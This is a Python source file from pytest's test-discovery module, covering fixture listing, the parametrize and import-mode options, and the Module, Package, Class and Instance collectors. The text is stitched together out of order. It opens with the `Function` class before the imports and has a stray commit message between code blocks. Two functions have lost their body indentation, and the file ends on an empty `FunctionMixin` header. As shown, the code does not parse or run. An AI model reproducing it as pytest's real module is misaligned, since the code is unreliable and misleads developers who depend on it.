    for session_item in session.items:
        write_item(session_item)
def showfixtures(config):
    """Implement the ``--fixtures`` command line option."""
    from _pytest.main import wrap_session

    return wrap_session(config, _showfixtures_main)
def _showfixtures_main(config, session):
    """Collect the session and print every available fixture, grouped by
    defining module; verbosity controls private fixtures and locations."""
    import _pytest.config

    session.perform_collect()
    curdir = py.path.local()
    tw = _pytest.config.create_terminal_writer(config)
    verbose = config.getvalue("verbose")

    fm = session._fixturemanager

    available = []
    seen = set()

    # gather each fixture definition once, keyed by (name, location)
    for argname, fixturedefs in fm._arg2fixturedefs.items():
        assert fixturedefs is not None
        if not fixturedefs:
            continue
        for fixturedef in fixturedefs:
            loc = getlocation(fixturedef.func, curdir)
            if (fixturedef.argname, loc) in seen:
                continue
            seen.add((fixturedef.argname, loc))
            available.append(
                (
                    len(fixturedef.baseid),
                    fixturedef.func.__module__,
                    curdir.bestrelpath(loc),
                    fixturedef.argname,
                    fixturedef,
                )
            )

    available.sort()
    currentmodule = None
    for baseid, module, bestrel, argname, fixturedef in available:
        if currentmodule != module:
            if not module.startswith("_pytest."):
                # print a separator when entering a new (non-internal) module
                tw.line()
                tw.sep("-", "fixtures defined from {}".format(module))
                currentmodule = module
        if verbose <= 0 and argname[0] == "_":
            # private fixtures are only shown with -v
            continue
        tw.write(argname, green=True)
        if fixturedef.scope != "function":
            tw.write(" [%s scope]" % fixturedef.scope, cyan=True)
        if verbose > 0:
            tw.write(" -- %s" % bestrel, yellow=True)
        tw.write("\n")
        loc = getlocation(fixturedef.func, curdir)
        doc = fixturedef.func.__doc__ or ""
        if doc:
            write_docstring(tw, doc)
        else:
            tw.line(" {}: no docstring available".format(loc), red=True)
    tw.line()
def write_docstring(tw, doc, indent=" "):
    """Write ``doc`` to the terminal writer ``tw``, prefixing every line
    with ``indent`` and dedenting the body relative to its first line."""
    doc = doc.rstrip()
    firstline, _, rest = doc.partition("\n")
    if firstline.strip():
        tw.line(indent + firstline.strip())
    if rest:
        for line in dedent(rest).split("\n"):
            tw.write(indent + line + "\n")
class Function(FunctionMixin, nodes.Item):
    """ a Function Item is responsible for setting up and executing a
    Python test function.
    """

    # disable since functions handle it themselves
    _ALLOW_MARKERS = False

    def __init__(
        self,
        name,
        parent,
        args=None,
        config=None,
        callspec=None,
        callobj=NOTSET,
        keywords=None,
        session=None,
        fixtureinfo=None,
        originalname=None,
    ):
        """
        :param name: full test name, including any parametrization suffix.
        :param parent: the parent collector node.
        :param callspec: the ``CallSpec2`` carrying parametrized values/marks.
        :param callobj: the underlying callable; resolved lazily from the
            parent when left as ``NOTSET``.
        :param fixtureinfo: precomputed fixture closure; looked up from the
            fixture manager when not given.
        :param originalname: the un-parametrized function name.
        """
        super().__init__(name, parent, config=config, session=session)
        self._args = args
        if callobj is not NOTSET:
            self.obj = callobj

        self.keywords.update(self.obj.__dict__)
        self.own_markers.extend(get_unpacked_marks(self.obj))
        if callspec:
            self.callspec = callspec
            # this is total hostile and a mess
            # keywords are broken by design by now
            # this will be redeemed later
            for mark in callspec.marks:
                # feel free to cry, this was broken for years before
                # and keywords cant fix it per design
                self.keywords[mark.name] = mark
            self.own_markers.extend(normalize_mark_list(callspec.marks))
        if keywords:
            self.keywords.update(keywords)

        # todo: this is a hell of a hack
        # https://github.com/pytest-dev/pytest/issues/4569
        self.keywords.update(
            {
                mark.name: True
                for mark in self.iter_markers()
                if mark.name not in self.keywords
            }
        )

        if fixtureinfo is None:
            fixtureinfo = self.session._fixturemanager.getfixtureinfo(
                self, self.obj, self.cls, funcargs=True
            )
        self._fixtureinfo = fixtureinfo
        self.fixturenames = fixtureinfo.names_closure
        self._initrequest()

        #: original function name, without any decorations (for example
        #: parametrization adds a ``"[...]"`` suffix to function names).
        #:
        #: .. versionadded:: 3.0
        self.originalname = originalname

    def _initrequest(self):
        # fresh funcargs mapping and fixture request for this item
        self.funcargs = {}
        self._request = fixtures.FixtureRequest(self)

    @property
    def function(self):
        "underlying python 'function' object"
        return getimfunc(self.obj)

    def _getobj(self):
        # resolve the callable from the parent, stripping any "[...]"
        # parametrization suffix from our node name
        name = self.name
        i = name.find("[")  # parametrization
        if i != -1:
            name = name[:i]
        return getattr(self.parent.obj, name)

    @property
    def _pyfuncitem(self):
        "(compatonly) for code expecting pytest-2.2 style request objects"
        return self

    @property
    def funcargnames(self):
        """ alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
        warnings.warn(FUNCARGNAMES, stacklevel=2)
        return self.fixturenames

    def runtest(self):
        """ execute the underlying test function. """
        self.ihook.pytest_pyfunc_call(pyfuncitem=self)

    def setup(self):
        super().setup()
        # resolve this item's fixtures before the test body runs
        fixtures.fillfixtures(self)
class FunctionDefinition(Function):
    """
    internal hack until we get actual definition nodes instead of the
    crappy metafunc hack

    Represents the test function *definition* (pre-parametrization); it is
    never meant to be executed as a test item.
    """

    def runtest(self):
        raise RuntimeError("function definitions are not supposed to be used")

    # setup must never run either; reuse the same guard
    setup = runtest
Factor out `_validate_parametrize_spelling`.
This makes it easier to read `pytest_generate_tests`.
""" Python test discovery, setup and run of test functions. """
import enum
import fnmatch
import inspect
import os
import sys
import warnings
from collections import Counter
from collections.abc import Sequence
from functools import partial
from textwrap import dedent
from typing import Tuple
import py
import _pytest
from _pytest import fixtures
from _pytest import nodes
from _pytest._code import filter_traceback
from _pytest.compat import ascii_escaped
from _pytest.compat import get_default_arg_names
from _pytest.compat import get_real_func
from _pytest.compat import getfslineno
from _pytest.compat import getimfunc
from _pytest.compat import getlocation
from _pytest.compat import is_generator
from _pytest.compat import iscoroutinefunction
from _pytest.compat import NOTSET
from _pytest.compat import REGEX_TYPE
from _pytest.compat import safe_getattr
from _pytest.compat import safe_isclass
from _pytest.compat import STRING_TYPES
from _pytest.config import hookimpl
from _pytest.deprecated import FUNCARGNAMES
from _pytest.main import FSHookProxy
from _pytest.mark import MARK_GEN
from _pytest.mark.structures import get_unpacked_marks
from _pytest.mark.structures import normalize_mark_list
from _pytest.outcomes import fail
from _pytest.outcomes import skip
from _pytest.pathlib import parts
from _pytest.warning_types import PytestCollectionWarning
from _pytest.warning_types import PytestUnhandledCoroutineWarning
def pyobj_property(name):
    """Build a read-only property that returns the ``obj`` of the nearest
    parent collector of the given type, or None when no such parent exists.

    ``name`` is the attribute name of a collector class looked up on the
    ``pytest`` namespace (e.g. "Module", "Class", "Instance").
    """
    def get(self):
        # pytest is imported lazily here to avoid an import cycle at module load.
        node = self.getparent(getattr(__import__("pytest"), name))
        if node is not None:
            return node.obj
        # implicit None when no matching parent is found
    doc = "python {} object this node was collected from (can be None).".format(
        name.lower()
    )
    return property(get, None, None, doc)
def pytest_addoption(parser):
    """Register command line options and ini settings for Python test
    discovery (file/class/function name patterns, import mode) and the
    fixture-listing CLI flags."""
    group = parser.getgroup("general")
    group.addoption(
        "--fixtures",
        "--funcargs",
        action="store_true",
        dest="showfixtures",
        default=False,
        help="show available fixtures, sorted by plugin appearance "
        "(fixtures with leading '_' are only shown with '-v')",
    )
    group.addoption(
        "--fixtures-per-test",
        action="store_true",
        dest="show_fixtures_per_test",
        default=False,
        help="show fixtures per test",
    )
    parser.addini(
        "python_files",
        type="args",
        # NOTE: default is also used in AssertionRewritingHook.
        default=["test_*.py", "*_test.py"],
        help="glob-style file patterns for Python test module discovery",
    )
    parser.addini(
        "python_classes",
        type="args",
        default=["Test"],
        help="prefixes or glob names for Python test class discovery",
    )
    parser.addini(
        "python_functions",
        type="args",
        default=["test"],
        help="prefixes or glob names for Python test function and method discovery",
    )
    parser.addini(
        "disable_test_id_escaping_and_forfeit_all_rights_to_community_support",
        type="bool",
        default=False,
        help="disable string escape non-ascii characters, might cause unwanted "
        "side effects(use at your own risk)",
    )
    group.addoption(
        "--import-mode",
        default="prepend",
        choices=["prepend", "append"],
        dest="importmode",
        help="prepend/append to sys.path when importing test modules, "
        "default is to prepend.",
    )
def pytest_cmdline_main(config):
    """Handle the informational command line modes.

    ``--fixtures`` and ``--fixtures-per-test`` short-circuit the normal test
    session and exit with status 0; otherwise fall through (implicit None)
    so the regular session runs.
    """
    options = config.option
    if options.showfixtures:
        showfixtures(config)
        return 0
    if options.show_fixtures_per_test:
        show_fixtures_per_test(config)
        return 0
def _validate_parametrize_spelling(metafunc):
"""Raise a specific error for common misspellings of "parametrize"."""
for mark_name in ["parameterize", "parametrise", "parameterise"]:
if metafunc.definition.get_closest_marker(mark_name):
msg = "{0} has '{1}' mark, spelling should be 'parametrize'"
fail(msg.format(metafunc.function.__name__, mark_name), pytrace=False)
def pytest_generate_tests(metafunc):
    """Default test-generation hook: expand ``@pytest.mark.parametrize``."""
    # Fail early with a helpful message on common misspellings.
    _validate_parametrize_spelling(metafunc)
    # Apply every parametrize marker found on the test definition.
    for marker in metafunc.definition.iter_markers(name="parametrize"):
        metafunc.parametrize(*marker.args, **marker.kwargs)
def pytest_configure(config):
    """Register the ``parametrize`` and ``usefixtures`` markers so that
    ``--strict-markers`` runs and ``--markers`` output know about them."""
    config.addinivalue_line(
        "markers",
        "parametrize(argnames, argvalues): call a test function multiple "
        "times passing in different arguments in turn. argvalues generally "
        "needs to be a list of values if argnames specifies only one name "
        "or a list of tuples of values if argnames specifies multiple names. "
        "Example: @parametrize('arg1', [1,2]) would lead to two calls of the "
        "decorated test function, one with arg1=1 and another with arg1=2."
        "see https://docs.pytest.org/en/latest/parametrize.html for more info "
        "and examples.",
    )
    config.addinivalue_line(
        "markers",
        "usefixtures(fixturename1, fixturename2, ...): mark tests as needing "
        "all of the specified fixtures. see "
        "https://docs.pytest.org/en/latest/fixture.html#usefixtures ",
    )
@hookimpl(trylast=True)
def pytest_pyfunc_call(pyfuncitem):
    """Call the underlying test function with its resolved fixture values.

    Runs trylast so plugins (e.g. async frameworks) can take over first.
    Async test functions are warned about and skipped, both when detected
    up-front and when the call returns an awaitable/async generator.
    """
    def async_warn():
        msg = "async def functions are not natively supported and have been skipped.\n"
        msg += "You need to install a suitable plugin for your async framework, for example:\n"
        msg += " - pytest-asyncio\n"
        msg += " - pytest-trio\n"
        msg += " - pytest-tornasync"
        # NOTE(review): ``msg`` contains no ``{}`` placeholder, so the
        # ``.format(pyfuncitem.nodeid)`` call below is a no-op — the node id
        # is never actually interpolated into the warning text.
        warnings.warn(PytestUnhandledCoroutineWarning(msg.format(pyfuncitem.nodeid)))
        skip(msg="async def function and no async plugin installed (see warnings)")
    testfunction = pyfuncitem.obj
    if iscoroutinefunction(testfunction) or (
        sys.version_info >= (3, 6) and inspect.isasyncgenfunction(testfunction)
    ):
        async_warn()
    funcargs = pyfuncitem.funcargs
    # Only pass the arguments the function actually declares.
    testargs = {arg: funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames}
    result = testfunction(**testargs)
    if hasattr(result, "__await__") or hasattr(result, "__aiter__"):
        async_warn()
    return True
def pytest_collect_file(path, parent):
    """Collect ``.py`` files that match the configured ``python_files``
    patterns (or ``__init__.py``); paths given directly on the command line
    (initial paths) bypass the pattern check."""
    ext = path.ext
    if ext == ".py":
        if not parent.session.isinitpath(path):
            if not path_matches_patterns(
                path, parent.config.getini("python_files") + ["__init__.py"]
            ):
                return
        ihook = parent.session.gethookproxy(path)
        return ihook.pytest_pycollect_makemodule(path=path, parent=parent)
def path_matches_patterns(path, patterns):
    """Return True if the given py.path.local matches at least one of the
    glob patterns in *patterns*, False otherwise."""
    for glob_pattern in patterns:
        if path.fnmatch(glob_pattern):
            return True
    return False
def pytest_pycollect_makemodule(path, parent):
    """Create the collector node for a Python file: ``__init__.py`` files
    become Package collectors, all other files a plain Module."""
    collector_class = Package if path.basename == "__init__.py" else Module
    return collector_class(path, parent)
@hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem(collector, name, obj):
    """Build a collection node for a Python object found during collection.

    Runs as a hook wrapper: if another implementation already produced a
    result, it is left untouched; otherwise classes and functions matching
    the configured naming filters are turned into collectors/items here.
    """
    outcome = yield
    res = outcome.get_result()
    if res is not None:
        return
    # nothing was collected elsewhere, let's do it here
    if safe_isclass(obj):
        if collector.istestclass(obj, name):
            outcome.force_result(Class(name, parent=collector))
    elif collector.istestfunction(obj, name):
        # mock seems to store unbound methods (issue473), normalize it
        obj = getattr(obj, "__func__", obj)
        # We need to try and unwrap the function if it's a functools.partial
        # or a functools.wrapped.
        # We mustn't if it's been wrapped with mock.patch (python 2 only)
        if not (inspect.isfunction(obj) or inspect.isfunction(get_real_func(obj))):
            filename, lineno = getfslineno(obj)
            warnings.warn_explicit(
                message=PytestCollectionWarning(
                    "cannot collect %r because it is not a function." % name
                ),
                category=None,
                filename=str(filename),
                lineno=lineno + 1,
            )
        elif getattr(obj, "__test__", True):
            if is_generator(obj):
                # yield-tests were removed in 4.0: collect but force xfail(run=False)
                res = Function(name, parent=collector)
                reason = "yield tests were removed in pytest 4.0 - {name} will be ignored".format(
                    name=name
                )
                res.add_marker(MARK_GEN.xfail(run=False, reason=reason))
                res.warn(PytestCollectionWarning(reason))
            else:
                res = list(collector._genfunctions(name, obj))
            outcome.force_result(res)
def pytest_make_parametrize_id(config, val, argname=None):
    """Default implementation: decline to provide a custom parametrize id,
    letting the built-in id generation take over."""
    return None
class PyobjContext:
    """Convenience accessors walking up the collection tree; each property
    returns the ``obj`` of the nearest parent of that collector type
    (or None when there is no such parent)."""
    module = pyobj_property("Module")
    cls = pyobj_property("Class")
    instance = pyobj_property("Instance")
class PyobjMixin(PyobjContext):
    """Mixin for nodes that wrap an underlying Python object (module, class,
    function), providing lazy access to it plus path/report helpers."""
    # Whether accessing ``obj`` also pulls marks off the underlying object;
    # Instance disables this to avoid duplicating markers (see below).
    _ALLOW_MARKERS = True
    @property
    def obj(self):
        """Underlying Python object (resolved lazily on first access)."""
        obj = getattr(self, "_obj", None)
        if obj is None:
            self._obj = obj = self._getobj()
            # XXX evil hack
            # used to avoid Instance collector marker duplication
            if self._ALLOW_MARKERS:
                self.own_markers.extend(get_unpacked_marks(self.obj))
        return obj
    @obj.setter
    def obj(self, value):
        self._obj = value
    def _getobj(self):
        """Gets the underlying Python object. May be overwritten by subclasses."""
        return getattr(self.parent.obj, self.name)
    def getmodpath(self, stopatmodule=True, includemodule=False):
        """ return python path relative to the containing module. """
        chain = self.listchain()
        chain.reverse()
        parts = []
        # Walk from this node up towards the root, collecting names;
        # Instance nodes ("()") are invisible in the dotted path.
        for node in chain:
            if isinstance(node, Instance):
                continue
            name = node.name
            if isinstance(node, Module):
                name = os.path.splitext(name)[0]
                if stopatmodule:
                    if includemodule:
                        parts.append(name)
                    break
            parts.append(name)
        parts.reverse()
        s = ".".join(parts)
        # parametrization brackets attach directly to the function name
        return s.replace(".[", "[")
    def reportinfo(self) -> Tuple[str, int, str]:
        """Return (fspath, lineno, domain-path) used in test reports."""
        # XXX caching?
        obj = self.obj
        compat_co_firstlineno = getattr(obj, "compat_co_firstlineno", None)
        if isinstance(compat_co_firstlineno, int):
            # nose compatibility
            fspath = sys.modules[obj.__module__].__file__
            if fspath.endswith(".pyc"):
                fspath = fspath[:-1]
            lineno = compat_co_firstlineno
        else:
            fspath, lineno = getfslineno(obj)
        modpath = self.getmodpath()
        assert isinstance(lineno, int)
        return fspath, lineno, modpath
class PyCollector(PyobjMixin, nodes.Collector):
    """Base collector for Python objects: applies the configured naming
    filters and turns matching attributes into child nodes."""
    def funcnamefilter(self, name):
        # matches the ``python_functions`` ini option (prefix or glob)
        return self._matches_prefix_or_glob_option("python_functions", name)
    def isnosetest(self, obj):
        """ Look for the __test__ attribute, which is applied by the
        @nose.tools.istest decorator
        """
        # We explicitly check for "is True" here to not mistakenly treat
        # classes with a custom __getattr__ returning something truthy (like a
        # function) as test classes.
        return safe_getattr(obj, "__test__", False) is True
    def classnamefilter(self, name):
        # matches the ``python_classes`` ini option (prefix or glob)
        return self._matches_prefix_or_glob_option("python_classes", name)
    def istestfunction(self, obj, name):
        """Return a truthy value if *obj* should be collected as a test
        function: name matches the filters, it is callable, and it is not
        itself a fixture."""
        if self.funcnamefilter(name) or self.isnosetest(obj):
            if isinstance(obj, staticmethod):
                # static methods need to be unwrapped
                obj = safe_getattr(obj, "__func__", False)
            return (
                safe_getattr(obj, "__call__", False)
                and fixtures.getfixturemarker(obj) is None
            )
        else:
            return False
    def istestclass(self, obj, name):
        # a class is collected if its name matches or nose marked it
        return self.classnamefilter(name) or self.isnosetest(obj)
    def _matches_prefix_or_glob_option(self, option_name, name):
        """
        checks if the given name matches the prefix or glob-pattern defined
        in ini configuration.
        """
        for option in self.config.getini(option_name):
            if name.startswith(option):
                return True
            # check that name looks like a glob-string before calling fnmatch
            # because this is called for every name in each collected module,
            # and fnmatch is somewhat expensive to call
            elif ("*" in option or "?" in option or "[" in option) and fnmatch.fnmatch(
                name, option
            ):
                return True
        return False
    def collect(self):
        """Collect child nodes from the underlying object's namespace
        (its own ``__dict__`` plus all base-class ``__dict__``s)."""
        if not getattr(self.obj, "__test__", True):
            return []
        # NB. we avoid random getattrs and peek in the __dict__ instead
        # (XXX originally introduced from a PyPy need, still true?)
        dicts = [getattr(self.obj, "__dict__", {})]
        for basecls in inspect.getmro(self.obj.__class__):
            dicts.append(basecls.__dict__)
        seen = {}
        values = []
        for dic in dicts:
            for name, obj in list(dic.items()):
                if name in seen:
                    continue
                seen[name] = True
                res = self._makeitem(name, obj)
                if res is None:
                    continue
                if not isinstance(res, list):
                    res = [res]
                values.extend(res)
        # stable ordering: by (fspath, lineno) from reportinfo()
        values.sort(key=lambda item: item.reportinfo()[:2])
        return values
    def _makeitem(self, name, obj):
        """Delegate node creation to the pytest_pycollect_makeitem hook."""
        # assert self.ihook.fspath == self.fspath, self
        return self.ihook.pytest_pycollect_makeitem(collector=self, name=name, obj=obj)
    def _genfunctions(self, name, funcobj):
        """Yield Function items for *funcobj*, one per parametrized call
        (or a single item when no parametrization applies)."""
        module = self.getparent(Module).obj
        clscol = self.getparent(Class)
        cls = clscol and clscol.obj or None
        fm = self.session._fixturemanager
        definition = FunctionDefinition(name=name, parent=self, callobj=funcobj)
        fixtureinfo = fm.getfixtureinfo(definition, funcobj, cls)
        metafunc = Metafunc(
            definition, fixtureinfo, self.config, cls=cls, module=module
        )
        # module- and class-level pytest_generate_tests implementations are
        # invoked in addition to the globally registered hook implementations
        methods = []
        if hasattr(module, "pytest_generate_tests"):
            methods.append(module.pytest_generate_tests)
        if hasattr(cls, "pytest_generate_tests"):
            methods.append(cls().pytest_generate_tests)
        self.ihook.pytest_generate_tests.call_extra(methods, dict(metafunc=metafunc))
        if not metafunc._calls:
            yield Function(name, parent=self, fixtureinfo=fixtureinfo)
        else:
            # add funcargs() as fixturedefs to fixtureinfo.arg2fixturedefs
            fixtures.add_funcarg_pseudo_fixture_def(self, metafunc, fm)
            # add_funcarg_pseudo_fixture_def may have shadowed some fixtures
            # with direct parametrization, so make sure we update what the
            # function really needs.
            fixtureinfo.prune_dependency_tree()
            for callspec in metafunc._calls:
                subname = "{}[{}]".format(name, callspec.id)
                yield Function(
                    name=subname,
                    parent=self,
                    callspec=callspec,
                    callobj=funcobj,
                    fixtureinfo=fixtureinfo,
                    keywords={callspec.id: True},
                    originalname=name,
                )
class Module(nodes.File, PyCollector):
    """ Collector for test classes and functions. """
    def _getobj(self):
        # the underlying object of a Module node is the imported module
        return self._importtestmodule()
    def collect(self):
        """Import the module, inject xunit-style setup/teardown fixtures,
        register its fixtures, then collect classes/functions as usual."""
        self._inject_setup_module_fixture()
        self._inject_setup_function_fixture()
        self.session._fixturemanager.parsefactories(self)
        return super().collect()
    def _inject_setup_module_fixture(self):
        """Injects a hidden autouse, module scoped fixture into the collected module object
        that invokes setUpModule/tearDownModule if either or both are available.
        Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
        other fixtures (#517).
        """
        setup_module = _get_first_non_fixture_func(
            self.obj, ("setUpModule", "setup_module")
        )
        teardown_module = _get_first_non_fixture_func(
            self.obj, ("tearDownModule", "teardown_module")
        )
        if setup_module is None and teardown_module is None:
            return
        @fixtures.fixture(autouse=True, scope="module")
        def xunit_setup_module_fixture(request):
            if setup_module is not None:
                _call_with_optional_argument(setup_module, request.module)
            yield
            if teardown_module is not None:
                _call_with_optional_argument(teardown_module, request.module)
        self.obj.__pytest_setup_module = xunit_setup_module_fixture
    def _inject_setup_function_fixture(self):
        """Injects a hidden autouse, function scoped fixture into the collected module object
        that invokes setup_function/teardown_function if either or both are available.
        Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
        other fixtures (#517).
        """
        setup_function = _get_first_non_fixture_func(self.obj, ("setup_function",))
        teardown_function = _get_first_non_fixture_func(
            self.obj, ("teardown_function",)
        )
        if setup_function is None and teardown_function is None:
            return
        @fixtures.fixture(autouse=True, scope="function")
        def xunit_setup_function_fixture(request):
            if request.instance is not None:
                # in this case we are bound to an instance, so we need to let
                # setup_method handle this
                yield
                return
            if setup_function is not None:
                _call_with_optional_argument(setup_function, request.function)
            yield
            if teardown_function is not None:
                _call_with_optional_argument(teardown_function, request.function)
        self.obj.__pytest_setup_function = xunit_setup_function_fixture
    def _importtestmodule(self):
        """Import the test module, translating the various import failure
        modes into CollectError with a helpful message."""
        # we assume we are only called once per module
        importmode = self.config.getoption("--import-mode")
        try:
            mod = self.fspath.pyimport(ensuresyspath=importmode)
        except SyntaxError:
            raise self.CollectError(
                _pytest._code.ExceptionInfo.from_current().getrepr(style="short")
            )
        except self.fspath.ImportMismatchError:
            e = sys.exc_info()[1]
            raise self.CollectError(
                "import file mismatch:\n"
                "imported module %r has this __file__ attribute:\n"
                "  %s\n"
                "which is not the same as the test file we want to collect:\n"
                "  %s\n"
                "HINT: remove __pycache__ / .pyc files and/or use a "
                "unique basename for your test file modules" % e.args
            )
        except ImportError:
            from _pytest._code.code import ExceptionInfo
            exc_info = ExceptionInfo.from_current()
            if self.config.getoption("verbose") < 2:
                exc_info.traceback = exc_info.traceback.filter(filter_traceback)
            exc_repr = (
                exc_info.getrepr(style="short")
                if exc_info.traceback
                else exc_info.exconly()
            )
            formatted_tb = str(exc_repr)
            raise self.CollectError(
                "ImportError while importing test module '{fspath}'.\n"
                "Hint: make sure your test modules/packages have valid Python names.\n"
                "Traceback:\n"
                "{traceback}".format(fspath=self.fspath, traceback=formatted_tb)
            )
        except _pytest.runner.Skipped as e:
            if e.allow_module_level:
                raise
            # BUGFIX: the backtick around the pytestmark snippet was
            # previously unbalanced (missing the closing backtick).
            raise self.CollectError(
                "Using pytest.skip outside of a test is not allowed. "
                "To decorate a test function, use the @pytest.mark.skip "
                "or @pytest.mark.skipif decorators instead, and to skip a "
                "module use `pytestmark = pytest.mark.{skip,skipif}`."
            )
        self.config.pluginmanager.consider_module(mod)
        return mod
class Package(Module):
    """Collector for a Python package (a directory with ``__init__.py``):
    collects the ``__init__.py`` module itself plus all test files found by
    recursively visiting the package directory."""
    def __init__(self, fspath, parent=None, config=None, session=None, nodeid=None):
        session = parent.session
        # deliberately skip Module.__init__ and initialize as a plain
        # filesystem collector
        nodes.FSCollector.__init__(
            self, fspath, parent=parent, config=config, session=session, nodeid=nodeid
        )
        self.name = fspath.dirname
        self.trace = session.trace
        self._norecursepatterns = session._norecursepatterns
        self.fspath = fspath
    def setup(self):
        # not using fixtures to call setup_module here because autouse fixtures
        # from packages are not called automatically (#4085)
        setup_module = _get_first_non_fixture_func(
            self.obj, ("setUpModule", "setup_module")
        )
        if setup_module is not None:
            _call_with_optional_argument(setup_module, self.obj)
        teardown_module = _get_first_non_fixture_func(
            self.obj, ("tearDownModule", "teardown_module")
        )
        if teardown_module is not None:
            func = partial(_call_with_optional_argument, teardown_module, self.obj)
            self.addfinalizer(func)
    def _recurse(self, dirpath):
        """Predicate passed to ``visit(rec=...)``: decide whether to descend
        into *dirpath* (falsy return value stops recursion)."""
        if dirpath.basename == "__pycache__":
            return False
        ihook = self.gethookproxy(dirpath.dirpath())
        if ihook.pytest_ignore_collect(path=dirpath, config=self.config):
            return
        for pat in self._norecursepatterns:
            if dirpath.check(fnmatch=pat):
                return False
        ihook = self.gethookproxy(dirpath)
        ihook.pytest_collect_directory(path=dirpath, parent=self)
        return True
    def gethookproxy(self, fspath):
        """Return a hook proxy scoped to the conftest files relevant for
        *fspath* (the plain config hook when all conftests apply)."""
        # check if we have the common case of running
        # hooks with all conftest.py files active
        pm = self.config.pluginmanager
        my_conftestmodules = pm._getconftestmodules(fspath)
        remove_mods = pm._conftest_plugins.difference(my_conftestmodules)
        if remove_mods:
            # one or more conftests are not in use at this fspath
            proxy = FSHookProxy(fspath, pm, remove_mods)
        else:
            # all plugins are active for this fspath
            proxy = self.config.hook
        return proxy
    def _collectfile(self, path, handle_dupes=True):
        """Collect a single file within the package, honoring ignore hooks
        and the duplicate-path bookkeeping."""
        assert (
            path.isfile()
        ), "{!r} is not a file (isdir={!r}, exists={!r}, islink={!r})".format(
            path, path.isdir(), path.exists(), path.islink()
        )
        ihook = self.gethookproxy(path)
        if not self.isinitpath(path):
            if ihook.pytest_ignore_collect(path=path, config=self.config):
                return ()
        if handle_dupes:
            keepduplicates = self.config.getoption("keepduplicates")
            if not keepduplicates:
                duplicate_paths = self.config.pluginmanager._duplicatepaths
                if path in duplicate_paths:
                    return ()
                else:
                    duplicate_paths.add(path)
        if self.fspath == path:  # __init__.py
            return [self]
        return ihook.pytest_collect_file(path=path, parent=self)
    def isinitpath(self, path):
        # True if the path was passed directly on the command line
        return path in self.session._initialpaths
    def collect(self):
        """Yield the package's own ``__init__.py`` Module (when it matches
        ``python_files``) followed by collectors for all files under the
        package directory, skipping files that belong to sub-packages."""
        this_path = self.fspath.dirpath()
        init_module = this_path.join("__init__.py")
        if init_module.check(file=1) and path_matches_patterns(
            init_module, self.config.getini("python_files")
        ):
            yield Module(init_module, self)
        pkg_prefixes = set()
        for path in this_path.visit(rec=self._recurse, bf=True, sort=True):
            # We will visit our own __init__.py file, in which case we skip it.
            is_file = path.isfile()
            if is_file:
                if path.basename == "__init__.py" and path.dirpath() == this_path:
                    continue
            # skip anything inside an already-seen sub-package prefix,
            # except that sub-package's own __init__.py
            parts_ = parts(path.strpath)
            if any(
                pkg_prefix in parts_ and pkg_prefix.join("__init__.py") != path
                for pkg_prefix in pkg_prefixes
            ):
                continue
            if is_file:
                yield from self._collectfile(path)
            elif not path.isdir():
                # Broken symlink or invalid/missing file.
                continue
            elif path.join("__init__.py").check(file=1):
                pkg_prefixes.add(path)
def _call_with_optional_argument(func, arg):
"""Call the given function with the given argument if func accepts one argument, otherwise
calls func without arguments"""
arg_count = func.__code__.co_argcount
if inspect.ismethod(func):
arg_count -= 1
if arg_count:
func(arg)
else:
func()
def _get_first_non_fixture_func(obj, names):
    """Return the first attribute of *obj* named in *names* that is not
    itself registered as a fixture, or None if there is none.

    Skipping fixtures avoids calling such a function twice (once as a
    fixture and once as an xunit-style setup/teardown hook).
    """
    candidates = (getattr(obj, name, None) for name in names)
    for candidate in candidates:
        if candidate is not None and fixtures.getfixturemarker(candidate) is None:
            return candidate
class Class(PyCollector):
    """ Collector for test methods. """
    def collect(self):
        """Return the single Instance child used to collect this class's
        test methods, or [] (with a warning) when the class cannot be
        collected (custom __init__/__new__ or __test__ = False)."""
        if not safe_getattr(self.obj, "__test__", True):
            return []
        if hasinit(self.obj):
            self.warn(
                PytestCollectionWarning(
                    "cannot collect test class %r because it has a "
                    "__init__ constructor (from: %s)"
                    % (self.obj.__name__, self.parent.nodeid)
                )
            )
            return []
        elif hasnew(self.obj):
            self.warn(
                PytestCollectionWarning(
                    "cannot collect test class %r because it has a "
                    "__new__ constructor (from: %s)"
                    % (self.obj.__name__, self.parent.nodeid)
                )
            )
            return []
        self._inject_setup_class_fixture()
        self._inject_setup_method_fixture()
        return [Instance(name="()", parent=self)]
    def _inject_setup_class_fixture(self):
        """Injects a hidden autouse, class scoped fixture into the collected class object
        that invokes setup_class/teardown_class if either or both are available.
        Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
        other fixtures (#517).
        """
        setup_class = _get_first_non_fixture_func(self.obj, ("setup_class",))
        teardown_class = getattr(self.obj, "teardown_class", None)
        if setup_class is None and teardown_class is None:
            return
        @fixtures.fixture(autouse=True, scope="class")
        def xunit_setup_class_fixture(cls):
            if setup_class is not None:
                func = getimfunc(setup_class)
                _call_with_optional_argument(func, self.obj)
            yield
            if teardown_class is not None:
                func = getimfunc(teardown_class)
                _call_with_optional_argument(func, self.obj)
        self.obj.__pytest_setup_class = xunit_setup_class_fixture
    def _inject_setup_method_fixture(self):
        """Injects a hidden autouse, function scoped fixture into the collected class object
        that invokes setup_method/teardown_method if either or both are available.
        Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
        other fixtures (#517).
        """
        setup_method = _get_first_non_fixture_func(self.obj, ("setup_method",))
        teardown_method = getattr(self.obj, "teardown_method", None)
        if setup_method is None and teardown_method is None:
            return
        @fixtures.fixture(autouse=True, scope="function")
        def xunit_setup_method_fixture(self, request):
            method = request.function
            if setup_method is not None:
                func = getattr(self, "setup_method")
                _call_with_optional_argument(func, method)
            yield
            if teardown_method is not None:
                func = getattr(self, "teardown_method")
                _call_with_optional_argument(func, method)
        self.obj.__pytest_setup_method = xunit_setup_method_fixture
class Instance(PyCollector):
    """Collector node sitting between a Class and its test methods; its
    underlying object is a fresh instance of the test class."""
    _ALLOW_MARKERS = False  # hack, destroy later
    # instances share the object with their parents in a way
    # that duplicates markers instances if not taken out
    # can be removed at node structure reorganization time
    def _getobj(self):
        # instantiate the test class (classes with __init__ were rejected earlier)
        return self.parent.obj()
    def collect(self):
        self.session._fixturemanager.parsefactories(self)
        return super().collect()
    def newinstance(self):
        """Create and store a fresh instance of the test class."""
        self.obj = self._getobj()
        return self.obj
class FunctionMixin(PyobjMixin):
